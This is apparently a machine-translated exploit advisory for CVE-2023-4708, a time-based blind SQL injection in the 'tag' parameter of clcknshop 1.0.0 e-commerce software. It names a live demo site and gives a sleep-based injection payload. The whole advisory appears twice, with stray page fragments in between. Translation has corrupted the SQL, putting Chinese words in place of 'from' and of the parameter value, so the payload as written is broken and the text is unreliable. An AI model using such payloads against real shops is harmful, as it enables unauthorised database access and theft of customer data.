#利用title: clcknshop 1.0.0 -SQL注入
#利用作者:饼干
#日期: 16/08/2023
#vendor: infosoftBD解决方案
#供应商homepage: https://infosoftbd.com/
#软件link: https://infosoftbd.com/multitenancy-e-commerce-solution/
#demo: https://kidszone.clckn.shop/
#版本: 1.0.0
#测试在: Windows 10 Pro
#Impact:数据库访问
#CVE: CVE-2023-4708
#CWE: CWE-89-CWE-74-CWE-707
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
SQL注入攻击可以允许未经授权访问敏感数据,修改
数据并崩溃应用程序或使其无法使用,导致收入损失,并且
损害公司声誉。
PATH: /COLLUCTION /ALL
获取参数“标签”很容易受到SQL注入的影响
---
参数:标签(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
payload: tag=t恤'xor(select(0)从(select(sleep(6)))a)xor'z
---
#利用作者:饼干
#日期: 16/08/2023
#vendor: infosoftBD解决方案
#供应商homepage: https://infosoftbd.com/
#软件link: https://infosoftbd.com/multitenancy-e-commerce-solution/
#demo: https://kidszone.clckn.shop/
#版本: 1.0.0
#测试在: Windows 10 Pro
#Impact:数据库访问
#CVE: CVE-2023-4708
#CWE: CWE-89-CWE-74-CWE-707
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
SQL注入攻击可以允许未经授权访问敏感数据,修改
数据并崩溃应用程序或使其无法使用,导致收入损失,并且
损害公司声誉。
PATH: /COLLUCTION /ALL
获取参数“标签”很容易受到SQL注入的影响
正在加载...
website
参数:标签(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
payload: tag=t恤'xor(select(0)从(select(sleep(6)))a)xor'z
---
